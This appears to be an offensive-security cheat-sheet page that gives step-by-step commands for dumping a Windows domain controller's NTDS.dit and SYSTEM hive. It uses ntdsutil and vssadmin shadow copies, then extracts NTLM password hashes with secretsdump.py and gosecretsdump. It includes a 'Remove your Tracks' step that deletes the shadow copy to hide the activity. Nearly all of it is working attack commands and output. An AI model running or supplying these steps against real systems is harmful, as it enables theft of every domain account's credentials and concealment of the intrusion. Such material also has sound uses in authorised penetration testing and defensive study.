NTDS.dit Dump & Extract

On Domain Controller - create snapshot with vssadmin.exe.

NTDSUtil

ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\Temp\NTDS" quit quit

The following files can then be exported

C:\Windows\Temp\NTDS\Active Directory\ntds.dit
C:\Windows\Temp\NTDS\registry\SYSTEM

Shadowcopy

Step 1 - Create ShadowCopy

PS C:\> vssadmin.exe create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5

Step 2 - Copy NTDS.dit and SYSTEM from ShadowCopy

NTDS:

PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit c:\ntds.dit

SYSTEM:

PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config\system c:\system

Or use reg save

reg SAVE HKLM\SYSTEM c:\SYSTEM

You can also use ShadowCopyView if you prefer a GUI.

{{%resources fa_icon_class=“far fa-file-archive” pattern=”.*(zip)”/%}}

Step 3 - Remove your Tracks

PS C:\> vssadmin delete shadows /shadow={3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}

Extract hashes

It can happen that [secretsdump.py]({{< ref”secretsdump-py” >}}) keeps looping and throwing out hashes. In this case, or maybe even preferably, use [Gosecretsdump]({{< ref “gosecretsdump” >}}).

Secretsdump.py

secretsdump.py -system SYSTEM -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile extracted-hashes -just-dc-ntlm -user-status -history

Gosecretsdump

./gosecretsdump -system SYSTEM -ntds NTDS.DIT -history -status -out hashes.log

Example NTDS/SYSTEM

Example NTDS.dit and SYSTEM files zipped below.

{{%resources fa_icon_class=“far fa-file” pattern=”.*(NTDS.DIT-SYSTEM)”/%}}

URL List

• Stealthbits.com - Extracting Password Hashes from the Ntds.dit File
• Thehacker.recipes - Dumping NTDS